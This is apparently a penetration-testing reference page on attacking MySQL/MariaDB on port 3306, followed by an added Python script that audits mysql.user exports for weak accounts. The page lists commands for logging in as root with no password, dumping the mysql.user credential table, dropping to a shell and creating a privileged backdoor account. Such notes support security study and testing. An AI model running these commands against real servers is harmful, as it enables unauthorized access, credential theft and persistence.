# Port 3306 - MySQL/MariaDB

MySQL is commonly found running on either Windows or Linux servers. The original MySQL product was bought by Oracle; the previous open-source variant was forked, and the fork is referred to as MariaDB.

Default credentials are often set to `root:` (user `root` with an empty password); in some instances, as in the example below, no password is required at all.

## MySQL/MariaDB Scanning and Enumeration

| Tool | Script/Module | Auth | MITRE ATT\&CK Tactic | Command                               |
| ---- | ------------- | ---- | -------------------- | ------------------------------------- |
| MSF  | mysql\_enum   | Y    | Reconnaissance       |                                       |
| Nmap | mysql-info    | N    | Reconnaissance       | `sudo nmap -A -p 3306 -n 10.10.10.10` |

## MySQL/MariaDB Exploitation

## MySQL/MariaDB Database Interaction

The MySQL command line tool can be used to interface with a remote MySQL/MariaDB instance.

{% code overflow="wrap" %}

```bash
# Accessing a Remote Server
mysql -h 10.10.10.10 -u root
mysql -h 10.10.10.10 -u root -e 'show databases;'

# Database Interaction (statements entered at the mysql> prompt)
show databases; # Shows all available databases
use %DATABASE%; # Select a database
show tables; # Show tables in the selected database
describe %TABLE%; # Show the column details of a table
select * from %TABLE%; # Show all data stored in a table

# Exploitation
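\! sh # Drop into a shell (the client's system command; it runs on the client host, not the database server)
mysql -h 10.10.10.10 -u root --password=%PASSWORD% -e "SELECT * FROM mysql.user;" # Credential Dumping
create user test identified by 'test'; # Create a new user
# Assign privileges with GRANT OPTION (this statement targets the account 'mysql').
# GRANT ... IDENTIFIED BY is accepted by MariaDB and MySQL 5.x; it was removed in MySQL 8.0.
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;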
```

{% endcode %}
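
The account states used above (a `root` login with no password, and an extra account granted privileges on `*.*` with `WITH GRANT OPTION`) can be checked for on a server you administer by auditing an export of `mysql.user`. The following is an added example, not part of the original page; the function name `audit_users`, the column order of the export, and the sample rows are assumptions of this example.

```python
# Added example: audit rows exported from mysql.user for the weak states this page relies on.
# Assumed export (the column order is this example's convention):
#   mysql -B -N -e "SELECT User, Host, plugin, authentication_string, Grant_priv FROM mysql.user"
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
# Socket plugins authenticate through the OS account, so an empty hash there is expected.
SOCKET_PLUGINS = {"auth_socket", "unix_socket"}

def audit_users(tsv: str) -> list[tuple[str, str]]:
    """Return (account, finding) pairs for each risky row in tab-separated input."""
    findings = []
    for line in tsv.splitlines():
        if not line.strip():
            continue
        fields = line.split("\t")
        if len(fields) != 5:
            findings.append((line, "unparsed row"))
            continue
        user, host, plugin, auth, grant_priv = fields
        account = f"'{user}'@'{host}'"
        remote = host not in LOCAL_HOSTS
        # The batch-mode client prints SQL NULL as the literal string NULL.
        if auth in ("", "NULL") and plugin not in SOCKET_PLUGINS:
            findings.append((account, "empty password"))
        if user == "":
            findings.append((account, "anonymous account"))
        if user == "root" and remote:
            findings.append((account, "root reachable from non-local host"))
        if grant_priv == "Y" and user != "root":
            findings.append((account, "non-root account holds GRANT OPTION"))
    return findings

# Constructed sample rows (not taken from a real server).
SAMPLE = "\n".join([
    "root\tlocalhost\tauth_socket\t\tY",
    "root\t%\tmysql_native_password\t\tY",
    "mysql\t%\tmysql_native_password\t*CONSTRUCTEDHASH\tY",
    "app\t10.10.10.%\tmysql_native_password\t*CONSTRUCTEDHASH\tN",
])

if __name__ == "__main__":
    for account, finding in audit_users(SAMPLE):
        print(f"{account}: {finding}")
```
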
